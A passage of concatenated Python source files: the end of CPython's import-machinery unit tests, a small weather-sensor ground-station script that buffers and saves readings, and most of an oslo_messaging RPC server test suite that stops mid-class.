ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
DaloyGround.py
|
from NRFReader import NRFReader
from WebServer import WebServer
from DataIO import DataIO
from threading import Thread
import os
class Singleton:
def __init__(self):
self.reader = NRFReader()
self.server = WebServer()
self.io = DataIO()
self.packets = []
self.packetId = 0
self.clear = False
self.backupSize = 15 # once every 5 mins for 1Hz refresh rate
self.refreshRate = 1 # 1 Hz
def clearCache(self):
self.packets[:] = []
def registerEntry(self, packet):
if self.clear:
self.clearCache()
self.clear = False
entry = {"id": self.packetId, "temperature": packet[0], "humidity": packet[1], "pressure": packet[2], "altitude": packet[3]}
self.packets.append(entry)
# flush cache
if len(self.packets) == self.backupSize and self.packetId > 0:
thread = Thread(target=self.io.saveData, args=(self.packets[:],))
thread.start()
self.clear = True
self.packetId += 1
def initServer(self):
self.server.initServer()
def startListening(self):
self.reader.start()
def getLatestEntry(self):
if len(self.packets) > 0:
return self.packets[-1]
else:
return {"id": -1, "temperature": 0, "humidity": 0, "pressure": 0, "altitude": 0}
def getAllEntries(self):
self.io.saveData(self.packets[:])
csv = self.io.readData()
return csv
instance = Singleton()
if __name__ == "__main__":
instance.initServer()
instance.startListening()
|
test_server.py
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import eventlet
import time
import threading
from oslo_config import cfg
import testscenarios
import mock
import oslo_messaging
from oslo_messaging import server as server_module
from oslo_messaging.tests import utils as test_utils
load_tests = testscenarios.load_tests_apply_scenarios
class ServerSetupMixin(object):
class Server(threading.Thread):
def __init__(self, transport, topic, server, endpoint, serializer):
self.controller = ServerSetupMixin.ServerController()
target = oslo_messaging.Target(topic=topic, server=server)
self.server = oslo_messaging.get_rpc_server(transport,
target,
[endpoint,
self.controller],
serializer=serializer)
super(ServerSetupMixin.Server, self).__init__()
self.daemon = True
def wait(self):
# Wait for the executor to process the stop message, indicating all
# test messages have been processed
self.controller.stopped.wait()
# Check start() does nothing with a running server
self.server.start()
self.server.stop()
self.server.wait()
def run(self):
self.server.start()
class ServerController(object):
def __init__(self):
self.stopped = threading.Event()
def stop(self, ctxt):
self.stopped.set()
class TestSerializer(object):
def serialize_entity(self, ctxt, entity):
return ('s' + entity) if entity else entity
def deserialize_entity(self, ctxt, entity):
return ('d' + entity) if entity else entity
def serialize_context(self, ctxt):
return dict([(k, 's' + v) for k, v in ctxt.items()])
def deserialize_context(self, ctxt):
return dict([(k, 'd' + v) for k, v in ctxt.items()])
def __init__(self):
self.serializer = self.TestSerializer()
def _setup_server(self, transport, endpoint, topic=None, server=None):
server = self.Server(transport,
topic=topic or 'testtopic',
server=server or 'testserver',
endpoint=endpoint,
serializer=self.serializer)
thread = threading.Thread(target=server.start)
thread.daemon = True
thread.start()
return server
def _stop_server(self, client, server, topic=None):
if topic is not None:
client = client.prepare(topic=topic)
client.cast({}, 'stop')
server.wait()
def _setup_client(self, transport, topic='testtopic'):
return oslo_messaging.RPCClient(transport,
oslo_messaging.Target(topic=topic),
serializer=self.serializer)
class TestRPCServer(test_utils.BaseTestCase, ServerSetupMixin):
def __init__(self, *args):
super(TestRPCServer, self).__init__(*args)
ServerSetupMixin.__init__(self)
def setUp(self):
super(TestRPCServer, self).setUp(conf=cfg.ConfigOpts())
def test_constructor(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(topic='foo', server='bar')
endpoints = [object()]
serializer = object()
server = oslo_messaging.get_rpc_server(transport, target, endpoints,
serializer=serializer)
self.assertIs(server.conf, self.conf)
self.assertIs(server.transport, transport)
self.assertIsInstance(server.dispatcher, oslo_messaging.RPCDispatcher)
self.assertIs(server.dispatcher.endpoints, endpoints)
self.assertIs(server.dispatcher.serializer, serializer)
self.assertEqual('blocking', server.executor)
def test_server_wait_method(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(topic='foo', server='bar')
endpoints = [object()]
serializer = object()
class MagicMockIgnoreArgs(mock.MagicMock):
'''A MagicMock which can never misinterpret the arguments passed to
it during construction.'''
def __init__(self, *args, **kwargs):
super(MagicMockIgnoreArgs, self).__init__()
server = oslo_messaging.get_rpc_server(transport, target, endpoints,
serializer=serializer)
# Mocking executor
server._executor_cls = MagicMockIgnoreArgs
# Here assigning executor's listener object to listener variable
# before calling wait method, because in wait method we are
# setting executor to None.
server.start()
listener = server._executor_obj.listener
server.stop()
# call server wait method
server.wait()
self.assertIsNone(server._executor_obj)
self.assertEqual(1, listener.cleanup.call_count)
def test_no_target_server(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
server = oslo_messaging.get_rpc_server(
transport,
oslo_messaging.Target(topic='testtopic'),
[])
try:
server.start()
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertEqual('testtopic', ex.target.topic)
else:
self.assertTrue(False)
def test_no_server_topic(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
target = oslo_messaging.Target(server='testserver')
server = oslo_messaging.get_rpc_server(transport, target, [])
try:
server.start()
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertEqual('testserver', ex.target.server)
else:
self.assertTrue(False)
def _test_no_client_topic(self, call=True):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
client = self._setup_client(transport, topic=None)
method = client.call if call else client.cast
try:
method({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.InvalidTarget, ex)
self.assertIsNotNone(ex.target)
else:
self.assertTrue(False)
def test_no_client_topic_call(self):
self._test_no_client_topic(call=True)
def test_no_client_topic_cast(self):
self._test_no_client_topic(call=False)
def test_client_call_timeout(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
finished = False
wait = threading.Condition()
class TestEndpoint(object):
def ping(self, ctxt, arg):
with wait:
if not finished:
wait.wait()
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.prepare(timeout=0).call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.MessagingTimeout, ex)
else:
self.assertTrue(False)
with wait:
finished = True
wait.notify()
self._stop_server(client, server_thread)
def test_unknown_executor(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
try:
oslo_messaging.get_rpc_server(transport, None, [], executor='foo')
except Exception as ex:
self.assertIsInstance(ex, oslo_messaging.ExecutorLoadFailure)
self.assertEqual('foo', ex.executor)
else:
self.assertTrue(False)
def test_cast(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def __init__(self):
self.pings = []
def ping(self, ctxt, arg):
self.pings.append(arg)
endpoint = TestEndpoint()
server_thread = self._setup_server(transport, endpoint)
client = self._setup_client(transport)
client.cast({}, 'ping', arg='foo')
client.cast({}, 'ping', arg='bar')
self._stop_server(client, server_thread)
self.assertEqual(['dsfoo', 'dsbar'], endpoint.pings)
def test_call(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
return arg
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
self.assertIsNone(client.call({}, 'ping', arg=None))
self.assertEqual(0, client.call({}, 'ping', arg=0))
self.assertEqual(False, client.call({}, 'ping', arg=False))
self.assertEqual([], client.call({}, 'ping', arg=[]))
self.assertEqual({}, client.call({}, 'ping', arg={}))
self.assertEqual('dsdsfoo', client.call({}, 'ping', arg='foo'))
self._stop_server(client, server_thread)
def test_direct_call(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
return arg
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
direct = client.prepare(server='testserver')
self.assertIsNone(direct.call({}, 'ping', arg=None))
self.assertEqual(0, client.call({}, 'ping', arg=0))
self.assertEqual(False, client.call({}, 'ping', arg=False))
self.assertEqual([], client.call({}, 'ping', arg=[]))
self.assertEqual({}, client.call({}, 'ping', arg={}))
self.assertEqual('dsdsfoo', direct.call({}, 'ping', arg='foo'))
self._stop_server(client, server_thread)
def test_context(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ctxt_check(self, ctxt, key):
return ctxt[key]
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
self.assertEqual('dsdsb',
client.call({'dsa': 'b'},
'ctxt_check',
key='a'))
self._stop_server(client, server_thread)
def test_failure(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
def ping(self, ctxt, arg):
raise ValueError(arg)
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, ValueError)
self.assertEqual('dsfoo', str(ex))
else:
self.assertTrue(False)
self._stop_server(client, server_thread)
def test_expected_failure(self):
transport = oslo_messaging.get_transport(self.conf, url='fake:')
class TestEndpoint(object):
@oslo_messaging.expected_exceptions(ValueError)
def ping(self, ctxt, arg):
raise ValueError(arg)
server_thread = self._setup_server(transport, TestEndpoint())
client = self._setup_client(transport)
try:
client.call({}, 'ping', arg='foo')
except Exception as ex:
self.assertIsInstance(ex, ValueError)
self.assertEqual('dsfoo', str(ex))
else:
self.assertTrue(False)
self._stop_server(client, server_thread)
class TestMultipleServers(test_utils.BaseTestCase, ServerSetupMixin):
_exchanges = [
('same_exchange', dict(exchange1=None, exchange2=None)),
('diff_exchange', dict(exchange1='x1', exchange2='x2')),
]
_topics = [
('same_topic', dict(topic1='t', topic2='t')),
('diff_topic', dict(topic1='t1', topic2='t2')),
]
_server = [
('same_server', dict(server1=None, server2=None)),
('diff_server', dict(server1='s1', server2='s2')),
]
_fanout = [
('not_fanout', dict(fanout1=None, fanout2=None)),
('fanout', dict(fanout1=True, fanout2=True)),
]
_method = [
('call', dict(call1=True, call2=True)),
('cast', dict(call1=False, call2=False)),
]
_endpoints = [
('one_endpoint',
dict(multi_endpoints=False,
expect1=['ds1', 'ds2'],
expect2=['ds1', 'ds2'])),
('two_endpoints',
dict(multi_endpoints=True,
expect1=['ds1'],
expect2=['ds2'])),
]
@classmethod
def generate_scenarios(cls):
cls.scenarios = testscenarios.multiply_scenarios(cls._exchanges,
cls._topics,
cls._server,
cls._fanout,
cls._method,
cls._endpoints)
# fanout call not supported
def filter_fanout_call(scenario):
params = scenario[1]
fanout = params['fanout1'] or params['fanout2']
call = params['call1'] or params['call2']
return not (call and fanout)
# listening multiple times on same topic/server pair not supported
def filter_same_topic_and_server(scenario):
params = scenario[1]
single_topic = params['topic1'] == params['topic2']
single_server = params['server1'] == params['server2']
return not (single_topic and single_server)
# fanout to multiple servers on same topic and exchange
# each endpoint will receive both messages
def fanout_to_servers(scenario):
params = scenario[1]
fanout = params['fanout1'] or params['fanout2']
single_exchange = params['exchange1'] == params['exchange2']
single_topic = params['topic1'] == params['topic2']
multi_servers = params['server1'] != params['server2']
if fanout and single_exchange and single_topic and multi_servers:
params['expect1'] = params['expect1'][:] + params['expect1']
params['expect2'] = params['expect2'][:] + params['expect2']
return scenario
# multiple endpoints on same topic and exchange
# either endpoint can get either message
def single_topic_multi_endpoints(scenario):
params = scenario[1]
single_exchange = params['exchange1'] == params['exchange2']
single_topic = params['topic1'] == params['topic2']
if single_topic and single_exchange and params['multi_endpoints']:
params['expect_either'] = (params['expect1'] +
params['expect2'])
params['expect1'] = params['expect2'] = []
else:
params['expect_either'] = []
return scenario
for f in [filter_fanout_call, filter_same_topic_and_server]:
cls.scenarios = filter(f, cls.scenarios)
for m in [fanout_to_servers, single_topic_multi_endpoints]:
cls.scenarios = map(m, cls.scenarios)
def __init__(self, *args):
super(TestMultipleServers, self).__init__(*args)
ServerSetupMixin.__init__(self)
def setUp(self):
super(TestMultipleServers, self).setUp(conf=cfg.ConfigOpts())
def test_multiple_servers(self):
url1 = 'fake:///' + (self.exchange1 or '')
url2 = 'fake:///' + (self.exchange2 or '')
transport1 = oslo_messaging.get_transport(self.conf, url=url1)
if url1 != url2:
transport2 = oslo_messaging.get_transport(self.conf, url=url1)
else:
transport2 = transport1
class TestEndpoint(object):
def __init__(self):
self.pings = []
def ping(self, ctxt, arg):
self.pings.append(arg)
def alive(self, ctxt):
return 'alive'
if self.multi_endpoints:
endpoint1, endpoint2 = TestEndpoint(), TestEndpoint()
else:
endpoint1 = endpoint2 = TestEndpoint()
thread1 = self._setup_server(transport1, endpoint1,
topic=self.topic1, server=self.server1)
thread2 = self._setup_server(transport2, endpoint2,
topic=self.topic2, server=self.server2)
client1 = self._setup_client(transport1, topic=self.topic1)
client2 = self._setup_client(transport2, topic=self.topic2)
client1 = client1.prepare(server=self.server1)
client2 = client2.prepare(server=self.server2)
if self.fanout1:
client1.call({}, 'alive')
client1 = client1.prepare(fanout=True)
if self.fanout2:
client2.call({}, 'alive')
client2 = client2.prepare(fanout=True)
(client1.call if self.call1 else client1.cast)({}, 'ping', arg='1')
(client2.call if self.call2 else client2.cast)({}, 'ping', arg='2')
self.assertTrue(thread1.isAlive())
self._stop_server(client1.prepare(fanout=None),
thread1, topic=self.topic1)
self.assertTrue(thread2.isAlive())
self._stop_server(client2.prepare(fanout=None),
thread2, topic=self.topic2)
def check(pings, expect):
self.assertEqual(len(expect), len(pings))
for a in expect:
self.assertIn(a, pings)
if self.expect_either:
check(endpoint1.pings + endpoint2.pings, self.expect_either)
else:
check(endpoint1.pings, self.expect1)
check(endpoint2.pings, self.expect2)
TestMultipleServers.generate_scenarios()
class TestServerLocking(test_utils.BaseTestCase):
def setUp(self):
super(TestServerLocking, self).setUp(conf=cfg.ConfigOpts())
def _logmethod(name):
def method(self):
with self._lock:
self._calls.append(name)
return method
executors = []
class FakeExecutor(object):
def __init__(self, *args, **kwargs):
self._lock = threading.Lock()
self._calls = []
self.listener = mock.MagicMock()
executors.append(self)
start = _logmethod('start')
stop = _logmethod('stop')
wait = _logmethod('wait')
